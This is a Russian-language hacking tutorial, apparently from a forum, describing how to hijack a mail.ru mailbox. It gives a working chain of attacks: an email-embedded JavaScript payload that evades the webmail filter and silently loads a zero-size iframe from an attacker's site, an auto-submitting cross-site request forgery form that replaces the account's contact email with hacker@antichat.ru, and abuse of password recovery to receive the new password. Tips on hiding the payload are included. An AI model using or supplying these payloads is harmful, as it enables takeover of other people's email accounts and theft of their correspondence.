WWW.MAIL.RU
Начну с почты №1 в России. На данный момент, благодаря пропусканию JavaScript и одной ошибке разработчиков, взлом этого ящика осуществить можно. Полагаю, что основные принципы общеизвестны. Как получить пароль? 1 - несанкционированно сменить его. Не пройдет, нужно знать ранее установленный. 2 - поменять секретный вопрос и воспользоваться службой борьбы с амнезией. Тоже не пройдет. 3 - установить свой альтернативный Email, чтобы получить на него новый, сгенерированный системой пароль. Не получится, последние две вышеперчисленные опции находятся в одной форме и также защищены паролем. Даже остальные, представляющие для нас меньший интерес настройки (Имя, фамилия и тд) теперь без ввода текущего пароля сменить не удастся. Казалось бы вариантов нет. Однако есть такой второстепенный по важности , неприметный раздел настроек "Контактная информация"(ICQ, сайт, телефон, место работы, часовой пояс и тд). В этом разделе можно также указать контактный Email. Весь фокус в том, что при этом в регистрационной информации альтернативный адрес меняется но тот, что прописан в анкете, и теперь можно получить пароль на мыло, воспользовавшись службой напоминания. Все просто.
URL: http://win.mail.ru/cgi-bin/anketa?page= … tichat.ru.
Правда методом GET смену настроек в ящике mail.ru теперь произвести нельзя, поэтому подробно опишу техническую сторону вопроса.
I. Отсылаем на нужный ящик письмо с кодом, который сгенерирует непосредственно в теле письма фрейм со ссылкой на наш сайт. По возможности скрипт должен срабатывать без какого-либо участия пользователя (нажатие, клик, наведение мышкой, загрузка изображения и тд):
<embed src="javascript:document.getElementById('xxx').innerHTML='<iframe src=http://yoursite.yourdomain.ru/yourscript.html></iframe>';this.wav"> <p id='xxx'>
Для того чтобы полностью обеспечить работоспособность скрипта, а так же маскировку, преобразуем:
<embed src="javascript:status=location;document.getElementById('xxx').innerHTML='<iframe src=http://yoursite.ru/yourscript.html width=0 height=0></iframe>';this.wav" width=0 height=0> <p id='xxx'>
В таком виде, коды символов заменяют буквы в имени элементов javascript и iframe, и почтовый скрипт не отфильтровывает их (читай статью "Особенности синтаксиса HTML"). Строчка status=location; создает в строке состояния видимость локального URL, чтобы постороннее мелькание не вызывало подозрений. Аттрибуты width и height, как фрейма, так и embed задаются равными нулю, и делают их невидимыми.
II. На ресурсе http://yoursite.ru распологаем HTML-документ с формой отправки измененных данных на сервер mail.ru. Содержимое yourscript.html:
<form method="post" action="http://win.mail.ru/cgi-bin/anketa" name="anketa">
<input type="hidden" name="page" value="2">
<input type="hidden" name="Email" value="hacker@antichat.ru">
<input type="hidden" value="Сохранить" name="Save">
</form>
<script>
document.anketa.submit();
</script>
Примечания: работу клиентской части скрипта в неизмененном виде гарантирую только для IE; форма отправки размещается на отдельном сайте специально, чтобы "разгрузить" письмо.